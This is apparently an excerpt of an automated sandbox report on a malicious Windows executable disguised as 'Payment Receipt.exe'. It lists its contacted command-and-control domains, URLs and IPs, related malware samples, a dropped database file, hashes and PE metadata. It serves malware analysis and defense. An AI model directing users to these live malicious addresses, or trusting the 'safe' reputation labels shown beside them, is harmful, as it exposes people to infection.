              http://www.44756.pizza/a59t/?1V=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?w0DDw=KH0hz6&1V=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg=0%Avira URL Cloudsafe
              https://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThM0%Avira URL Cloudsafe
              http://www.sonixingenuine.shop/01c7/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/?1V=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/?1V=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/0%Avira URL Cloudsafe
              http://cifasnc.info/xmlrpc.php0%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/?1V=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&w0DDw=KH0hz60%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              nosolofichas.online
              		84.32.84.32
              		truetrue
                		unknown
                www.moyu19.pro
                		154.39.239.237
                		truetrue
                  		unknown
                  dns.ladipage.com
                  		13.228.81.39
                  		truefalse
                    		high
                    www.cifasnc.info
                    		188.114.97.3
                    		truetrue
                      		unknown
                      promocao.info
                      		84.32.84.32
                      		truetrue
                        		unknown
                        www.grimbo.boats
                        		104.21.18.171
                        		truetrue
                          		unknown
                          www.lonfor.website
                          		199.192.21.169
                          		truetrue
                            		unknown
                            www.denture-prices.click
                            		199.59.243.228
                            		truetrue
                              		unknown
                              www.gayhxi.info
                              		47.83.1.90
                              		truetrue
                                		unknown
                                www.investshares.net
                                		154.197.162.239
                                		truetrue
                                  		unknown
                                  zcdn.8383dns.com
                                  		134.122.133.80
                                  		truetrue
                                    		unknown
                                    www.adadev.info
                                    		47.83.1.90
                                    		truetrue
                                      		unknown
                                      www.ebsmadrid.store
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.nosolofichas.online
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.sonixingenuine.shop
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.jrcov55qgcxp5fwa.top
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.promocao.info
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.44756.pizza
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.grimbo.boats/kxtt/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.44756.pizza/a59t/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.adadev.info/ctdy/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lonfor.website/bowc/?w0DDw=KH0hz6&1V=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0=true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nosolofichas.online/hqr6/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.moyu19.pro/b9e2/?1V=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.investshares.net/cf9p/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.promocao.info/zaz4/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.gayhxi.info/k2i2/?1V=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.nosolofichas.online/hqr6/?1V=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.moyu19.pro/b9e2/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lonfor.website/bowc/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.grimbo.boats/kxtt/?w0DDw=KH0hz6&1V=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg=true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.44756.pizza/a59t/?1V=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sonixingenuine.shop/01c7/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.promocao.info/zaz4/?1V=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.investshares.net/cf9p/?1V=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cifasnc.info/8rr3/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.denture-prices.click/dx3i/?1V=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&w0DDw=KH0hz6true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.denture-prices.click/dx3i/true
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabfc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://cifasnc.info/8rr3/?1V=iJ8hmWjdEFuk0u09mxt/ifc.exe, 00000005.00000002.4098630415.00000000047E6000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.0000000003E86000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.moyu19.proMEREhDqMRRNSzT.exe, 00000006.00000002.4099825496.000000000511C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.comfc.exe, 00000005.00000002.4098630415.0000000004B0A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000005.00000002.4100552512.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.00000000041AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.sonixingenuine.shop/01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMfc.exe, 00000005.00000002.4098630415.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.000000000433C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://cifasnc.info/xmlrpc.phpfc.exe, 00000005.00000002.4098630415.00000000047E6000.00000004.10000000.00040000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4098176125.0000000003E86000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000005.00000002.4100658810.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    154.197.162.239
                                                                    		www.investshares.netSeychelles
                                                                    		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                    104.21.18.171
                                                                    		www.grimbo.boatsUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    199.192.21.169
                                                                    		www.lonfor.websiteUnited States
                                                                    		22612NAMECHEAP-NETUStrue
                                                                    47.83.1.90
                                                                    		www.gayhxi.infoUnited States
                                                                    		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                                    188.114.97.3
                                                                    		www.cifasnc.infoEuropean Union
                                                                    		13335CLOUDFLARENETUStrue
                                                                    84.32.84.32
                                                                    		nosolofichas.onlineLithuania
                                                                    		33922NTT-LT-ASLTtrue
                                                                    13.228.81.39
                                                                    		dns.ladipage.comUnited States
                                                                    		16509AMAZON-02USfalse
                                                                    134.122.133.80
                                                                    		zcdn.8383dns.comUnited States
                                                                    		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                    199.59.243.228
                                                                    		www.denture-prices.clickUnited States
                                                                    		395082BODIS-NJUStrue
                                                                    154.39.239.237
                                                                    		www.moyu19.proUnited States
                                                                    		174COGENT-174UStrue

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1583685
                                                                    Start date and time:2025-01-03 11:38:04 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 14s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:7
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Payment Receipt.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@5/1@14/10
                                                                    EGA Information:
                                                                    • Successful, ratio: 80%
                                                                    HCA Information:
                                                                    • Successful, ratio: 94%
                                                                    • Number of executed functions: 15
                                                                    • Number of non-executed functions: 327
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 172.202.163.200, 13.107.246.45
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target MEREhDqMRRNSzT.exe, PID 4144 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    05:40:05API Interceptor10306194x Sleep call for process: fc.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    154.197.162.239inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • www.investshares.net/cf9p/
                                                                    104.21.18.171SecuriteInfo.com.Variant.Tedy.130342.18814.exeGet hashmaliciousFormBookBrowse
                                                                    • www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx
                                                                    199.192.21.169inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lonfor.website/bowc/
                                                                    URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                    • www.technectar.top/ghvt/
                                                                    FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                    • www.technectar.top/ghvt/
                                                                    NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tophm.xyz/30rz/
                                                                    lPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                                                    • www.zenscape.top/d8cw/
                                                                    Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                    • www.zenscape.top/d8cw/
                                                                    8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                    • www.cenfresh.life/6iok/
                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                    • www.selftip.top/85su/
                                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                                    • www.technectar.top/ghvt/
                                                                    NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                    • www.selftip.top/85su/
                                                                    47.83.1.90SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                    • www.cruycq.info/lf6y/
                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                    • www.gayhxi.info/jfb9/
                                                                    188.114.97.3dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                    • /api/get/free
                                                                    dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                    • /api/get/free
                                                                    RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                    • www.rgenerousrs.store/o362/
                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                    • www.beylikduzu616161.xyz/2nga/
                                                                    Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                    • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                    ce.vbsGet hashmaliciousUnknownBrowse
                                                                    • paste.ee/d/lxvbq
                                                                    Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                    • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                    PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                    • www.ssrnoremt-rise.sbs/3jsc/
                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • filetransfer.io/data-package/zWkbOqX7/download
                                                                    http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                    • kklk16.bsyo45ksda.top/favicon.ico

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    www.grimbo.boatsinv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.182.198
                                                                    CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.182.198
                                                                    zcdn.8383dns.cominv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.21.203.24
                                                                    www.investshares.netinv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.197.162.239
                                                                    dns.ladipage.comORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.228.81.39
                                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.179.173.60
                                                                    Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 18.139.62.226
                                                                    XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 13.228.81.39
                                                                    Swift copy.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.139.62.226
                                                                    www.lonfor.websiteinv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.21.169
                                                                    www.gayhxi.infoinv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 47.83.1.90
                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                    • 47.83.1.90
                                                                    www.cifasnc.infoACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.128.109
                                                                    bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                    • 172.67.128.109

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUShttp://www.technoafriwave.rwGet hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    dropper.exeGet hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                    • 188.114.97.3
                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                    • 104.21.32.1
                                                                    PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                    • 104.21.67.152
                                                                    http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                                    • 104.20.4.235
                                                                    https://myburbank-uat.3didemo.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.26.13.57
                                                                    COMING-ASABCDEGROUPCOMPANYLIMITEDHKinv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.197.162.239
                                                                    vcimanagement.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 156.241.105.229
                                                                    vcimanagement.armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 156.241.72.39
                                                                    vcimanagement.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 156.250.23.164
                                                                    vcimanagement.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 156.224.192.71
                                                                    vcimanagement.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 156.250.7.48
                                                                    vcimanagement.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                    • 156.250.23.181
                                                                    loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.250.7.23
                                                                    loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                    • 154.212.186.183
                                                                    db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                    • 156.250.110.116
                                                                    VODANETInternationalIP-BackboneofVodafoneDEHilix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                    • 178.7.142.40
                                                                    inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 47.83.1.90
                                                                    armv5l.elfGet hashmaliciousUnknownBrowse
                                                                    • 2.206.129.205
                                                                    armv4l.elfGet hashmaliciousUnknownBrowse
                                                                    • 88.77.228.24
                                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                                    • 88.73.45.174
                                                                    loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 88.66.40.190
                                                                    kwari.mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 92.79.235.220
                                                                    botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                    • 178.12.160.225
                                                                    botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                    • 88.66.204.59
                                                                    loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                    • 47.80.88.42
                                                                    NAMECHEAP-NETUShttp://keywestlending.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                    • 104.219.248.99
                                                                    inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                    • 199.192.21.169
                                                                    loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                    • 37.61.233.171
                                                                    https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 198.54.116.86
                                                                    SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                    • 162.0.236.169
                                                                    Laurier Partners Proposal.emlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 199.188.207.168
                                                                    https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 199.188.200.142
                                                                    http://jonotarmot.com/dcs/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 198.54.120.20
                                                                    cali.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 198.54.122.135
                                                                    https://towergroupofcompany.com/wp-includes/blobcit.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 63.250.38.156

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\17O3k-2I

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\fc.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.964815883015399
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Payment Receipt.exe
                                                                    File size:289'280 bytes
                                                                    MD5:e6bd9e9d02f848789769edcf7023e15c
                                                                    SHA1:f87837fe132810e33552511906bc35089c213f7b
                                                                    SHA256:f7e7d1d597fa001cfdfdc86c9aa5c97578b110f3598a2c9fdb4158abe760acc2
                                                                    SHA512:4dcabc0801f5840d8685548ba066319a6dcbd3b544f432f1567a9b125e344d02d41fff03c262b812f29deb17fcb45dc9d0d22e5f1386cef7006b8c80c0ca46ff
                                                                    SSDEEP:6144:H8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3ro:r/dhQJqiOKsPDOZLGeDk3r
                                                                    TLSH:D254221A9F26F206D0FD2673351F4742B671472DBEA52F21B4992CA28D90CBE5EC03B1
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...................p....@................

                                                                    File Icon

                                                                    Icon Hash:90cececece8e8eb0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x401580
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
